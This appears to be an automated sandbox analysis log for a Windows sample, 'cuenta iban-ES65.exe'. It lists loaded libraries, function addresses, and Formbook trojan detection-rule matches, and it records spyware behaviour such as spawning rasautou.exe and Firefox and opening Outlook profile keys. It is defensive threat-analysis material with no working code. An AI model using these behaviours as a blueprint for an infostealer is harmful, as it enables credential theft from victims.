Source: C:\Program Files (x86)\BWNPSyVEikXKQhEyMSntqjOiFQrxuqKaQxvfwAUNCbMREyWLKolYChTODl\XHYtgzYIOwxqJ.exe	Code function: 4_2_02F91FE6	4_2_02F91FE6
Source: C:\Program Files (x86)\BWNPSyVEikXKQhEyMSntqjOiFQrxuqKaQxvfwAUNCbMREyWLKolYChTODl\XHYtgzYIOwxqJ.exe	Code function: 4_2_02F987C3	4_2_02F987C3
Source: C:\Program Files (x86)\BWNPSyVEikXKQhEyMSntqjOiFQrxuqKaQxvfwAUNCbMREyWLKolYChTODl\XHYtgzYIOwxqJ.exe	Code function: 4_2_02F987C6	4_2_02F987C6
Source: C:\Program Files (x86)\BWNPSyVEikXKQhEyMSntqjOiFQrxuqKaQxvfwAUNCbMREyWLKolYChTODl\XHYtgzYIOwxqJ.exe	Code function: 4_2_02FAECE6	4_2_02FAECE6
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_0531A526	5_2_0531A526
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_053075C6	5_2_053075C6
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_0530F5C9	5_2_0530F5C9
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_05250445	5_2_05250445
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_052BD480	5_2_052BD480
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_05252760	5_2_05252760
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_0525A760	5_2_0525A760
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_05306757	5_2_05306757
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_052ED62C	5_2_052ED62C
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_0526C600	5_2_0526C600
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_05274670	5_2_05274670
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_052FD646	5_2_052FD646
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_05250680	5_2_05250680
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_052C36EC	5_2_052C36EC
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_0524C6E0	5_2_0524C6E0
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_0530F6F6	5_2_0530F6F6
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_0530A6C0	5_2_0530A6C0
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_052ED130	5_2_052ED130
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_0523F113	5_2_0523F113
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_0531010E	5_2_0531010E
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_0529717A	5_2_0529717A
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_0526B1E0	5_2_0526B1E0
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_052551C0	5_2_052551C0
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_052FE076	5_2_052FE076
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_052400A0	5_2_052400A0
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_0528508C	5_2_0528508C
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_053070F1	5_2_053070F1
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_0525B0D0	5_2_0525B0D0
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_0530F330	5_2_0530F330
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_0525E310	5_2_0525E310
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_05241380	5_2_05241380
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_0530124C	5_2_0530124C
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_0523D2EC	5_2_0523D2EC
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_0530FD27	5_2_0530FD27
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_0524AD00	5_2_0524AD00
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_05250D69	5_2_05250D69
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_05307D4C	5_2_05307D4C
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_05262DB0	5_2_05262DB0
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_052EFDF4	5_2_052EFDF4
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_05259DD0	5_2_05259DD0
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_0525AC20	5_2_0525AC20
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_05240C12	5_2_05240C12
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_05253C60	5_2_05253C60
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_0530EC60	5_2_0530EC60
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_05306C69	5_2_05306C69
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_052FEC4C	5_2_052FEC4C
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_052E9C98	5_2_052E9C98
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_0526FCE0	5_2_0526FCE0
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_0531ACEB	5_2_0531ACEB
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_05268CDF	5_2_05268CDF
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_0525CF00	5_2_0525CF00
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_0530FF63	5_2_0530FF63
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_0530EFBF	5_2_0530EFBF
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_05256FE0	5_2_05256FE0
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_05301FC6	5_2_05301FC6
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_052F0E6D	5_2_052F0E6D
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_05292E48	5_2_05292E48
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_05270E50	5_2_05270E50
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_05251EB2	5_2_05251EB2
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_05300EAD	5_2_05300EAD
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_05242EE8	5_2_05242EE8
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_05309ED2	5_2_05309ED2
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_0524E9A0	5_2_0524E9A0
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_0530E9A6	5_2_0530E9A6
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_052959C0	5_2_052959C0
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_052F0835	5_2_052F0835
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_05253800	5_2_05253800
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_0527E810	5_2_0527E810
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_0530F872	5_2_0530F872
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_05236868	5_2_05236868
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_05259870	5_2_05259870
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_0526B870	5_2_0526B870
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_052C98B2	5_2_052C98B2
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_05266882	5_2_05266882
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_053078F3	5_2_053078F3
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_052528C0	5_2_052528C0
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_053018DA	5_2_053018DA
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_0530FB2E	5_2_0530FB2E
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_0528DB19	5_2_0528DB19
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_05250B10	5_2_05250B10
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_052C4BC0	5_2_052C4BC0
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_0530CA13	5_2_0530CA13
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_0530EA5B	5_2_0530EA5B
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_0526FAA0	5_2_0526FAA0
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_0530FA89	5_2_0530FA89
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_03272EE0	5_2_03272EE0
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_0326C130	5_2_0326C130
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_0326E0B0	5_2_0326E0B0
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_0327466D	5_2_0327466D
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_03274670	5_2_03274670
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_0328AB90	5_2_0328AB90
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_0326DE90	5_2_0326DE90

Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: String function: 37787BE4 appears 88 times
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: String function: 377AE692 appears 84 times
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: String function: 3772B910 appears 266 times
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: String function: 377BEF10 appears 104 times
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: String function: 37775050 appears 36 times
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: String function: 052BE692 appears 84 times
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: String function: 052CEF10 appears 105 times
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: String function: 05297BE4 appears 89 times
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: String function: 0523B910 appears 266 times
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: String function: 05285050 appears 36 times

Source: cuenta iban-ES65.exe

Static PE information: invalid certificate

Source: cuenta iban-ES65.exe, 00000002.00000003.13177808681.0000000037686000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: OriginalFilenamentdll.dllj% vs cuenta iban-ES65.exe

Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Section loaded: rasdlg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Section loaded: mprapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\BWNPSyVEikXKQhEyMSntqjOiFQrxuqKaQxvfwAUNCbMREyWLKolYChTODl\XHYtgzYIOwxqJ.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\BWNPSyVEikXKQhEyMSntqjOiFQrxuqKaQxvfwAUNCbMREyWLKolYChTODl\XHYtgzYIOwxqJ.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\BWNPSyVEikXKQhEyMSntqjOiFQrxuqKaQxvfwAUNCbMREyWLKolYChTODl\XHYtgzYIOwxqJ.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\BWNPSyVEikXKQhEyMSntqjOiFQrxuqKaQxvfwAUNCbMREyWLKolYChTODl\XHYtgzYIOwxqJ.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\BWNPSyVEikXKQhEyMSntqjOiFQrxuqKaQxvfwAUNCbMREyWLKolYChTODl\XHYtgzYIOwxqJ.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\BWNPSyVEikXKQhEyMSntqjOiFQrxuqKaQxvfwAUNCbMREyWLKolYChTODl\XHYtgzYIOwxqJ.exe	Section loaded: fwpuclnt.dll	Jump to behavior

Source: cuenta iban-ES65.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 00000002.00000002.13296486032.00000000373E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.17650481892.0000000000B70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.17648564741.0000000003260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.13297432271.0000000037A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.17651341900.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.17650879103.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.17652208499.0000000005110000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/10@26/15

Source: C:\Users\user\Desktop\cuenta iban-ES65.exe

0_2_004030EC

Source: C:\Users\user\Desktop\cuenta iban-ES65.exe

Code function: 0_2_0040432F GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

0_2_0040432F

Source: C:\Users\user\Desktop\cuenta iban-ES65.exe

Code function: 0_2_0040205E CoCreateInstance,MultiByteToWideChar,

0_2_0040205E

Source: C:\Users\user\Desktop\cuenta iban-ES65.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\Arsenalers.ini

Jump to behavior

Source: C:\Users\user\Desktop\cuenta iban-ES65.exe

File created: C:\Users\user\AppData\Local\Temp\nsn871F.tmp

Jump to behavior

Source: cuenta iban-ES65.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\cuenta iban-ES65.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\cuenta iban-ES65.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\cuenta iban-ES65.exe

File read: C:\Users\user\Desktop\cuenta iban-ES65.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\cuenta iban-ES65.exe C:\Users\user\Desktop\cuenta iban-ES65.exe
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Process created: C:\Users\user\Desktop\cuenta iban-ES65.exe C:\Users\user\Desktop\cuenta iban-ES65.exe
Source: C:\Program Files (x86)\BWNPSyVEikXKQhEyMSntqjOiFQrxuqKaQxvfwAUNCbMREyWLKolYChTODl\XHYtgzYIOwxqJ.exe	Process created: C:\Windows\SysWOW64\rasautou.exe C:\Windows\SysWOW64\rasautou.exe
Source: C:\Windows\SysWOW64\rasautou.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Process created: C:\Users\user\Desktop\cuenta iban-ES65.exe C:\Users\user\Desktop\cuenta iban-ES65.exe	Jump to behavior
Source: C:\Program Files (x86)\BWNPSyVEikXKQhEyMSntqjOiFQrxuqKaQxvfwAUNCbMREyWLKolYChTODl\XHYtgzYIOwxqJ.exe	Process created: C:\Windows\SysWOW64\rasautou.exe C:\Windows\SysWOW64\rasautou.exe	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe	Jump to behavior

Source: C:\Users\user\Desktop\cuenta iban-ES65.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\cuenta iban-ES65.exe

File written: C:\Windows\hotdoggen.ini

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\rasautou.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: cuenta iban-ES65.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

